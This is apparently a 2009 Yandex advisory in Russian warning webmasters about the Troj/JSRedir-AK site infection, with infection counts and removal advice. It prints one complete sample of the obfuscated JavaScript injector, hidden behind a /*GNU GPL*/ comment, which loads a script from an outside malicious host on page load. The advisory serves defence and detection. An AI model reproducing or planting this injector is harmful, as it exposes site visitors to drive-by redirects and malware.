В течение нескольких дней мы наблюдаем резкий рост числа сайтов, зараженных новым вирусом. Вредоносный код добавляется в файлы *.js на заражаемом сайте или просто в конец страницы. Злоумышленники пытаются замаскировать вредоносный код от веб-мастера при помощи использования комментария /*GNU GPL*/. Этот тип заражения сайтов классифицирован нашим антивирусным партнером компанией Sophos как Troj/JSRedir-AK.
Вредоносный код выглядит, например, так:
/*GNU GPL*/ try{window.onload = function(){var F1s4h5mjnzo = document.createElement('s(c&@^)r&^#i)(@p^&t^))'.replace(/#|@|&|\^|\!|\)|\(|\$/ig, ''));F1s4h5mjnzo.setAttribute('type', 'text/javascript');F1s4h5mjnzo.setAttribute('src', 'h@$!t#!!t!)$&p#:#&/@@/))#f(o(r&!$b!&e##^s!-$^!c#$&o&m).^(#m@@y#b@e@#s&&t@!y^)!#o(u((($x$!i#(.@&)@c&n@^@.(#^&s(#@i)(@@t^e(#&m&e^#$t!@e$^#r$-#c@&#o#^m^^(.@x!x^)x!x!@@x))!x(x$$@x$&x!))#l(@@x$.)&$r@($^u)!@):@^$&)8@)@0&8#$0)&/&c!l$a(&&r$i@&@n!$^.()(c(##o^#(m&$$)$/@#^c!(l)#!a)!(r$i&$)n(().$$c&^##@o(!&^m^^/^d@#@e$(@!^v#@i))&^)a(#!n)!t)@)a$r!t$(.($&c!^&o!#m)&@&/))(g)&^o^@)o)(#g&(#^l()!e!^!.)&@c)&&!o)()$!m@^/!!e@!x(@&a&@@m&i$n^@e&#(^&r)^.(c&(&o^&m(/#@)' .replace(/#|\!|\(|\$|&|\)|\^|@/ig, ''));F1s4h5mjnzo.setAttribute('defer', 'defer');F1s4h5mjnzo.setAttribute('id', 'J#(i)^#v$@@o(^@8(x!&w(^&r!&#^a$$^@e^3(^@$z#)i!)s#&#' .replace(/\(|@|\^|&|\)|\$|\!|#/ig, ''));document.body.appendChild(F1s4h5mjnzo);}} catch(e) {}
На текущий момент Яндексу известно примерно о двух тысячах сайтов, зараженных вирусом типа Troj/JSRedir-AK. Если вы заметили подобный код на вашем сайте, удалите его. Для того, чтобы своевременно получать уведомления о размещении на страницах вашего сайта вредоносного кода, советуем зарегистрировать сайт в Яндекс.Вебмастере.
UPD: Уже больше 2200.
UPD2: Уже больше 3000 (14:00 25.12.2009).
Группа пролетарского гнева компании Яндекс
P.S. Сайт ООН содержит вредоносный код другого типа :)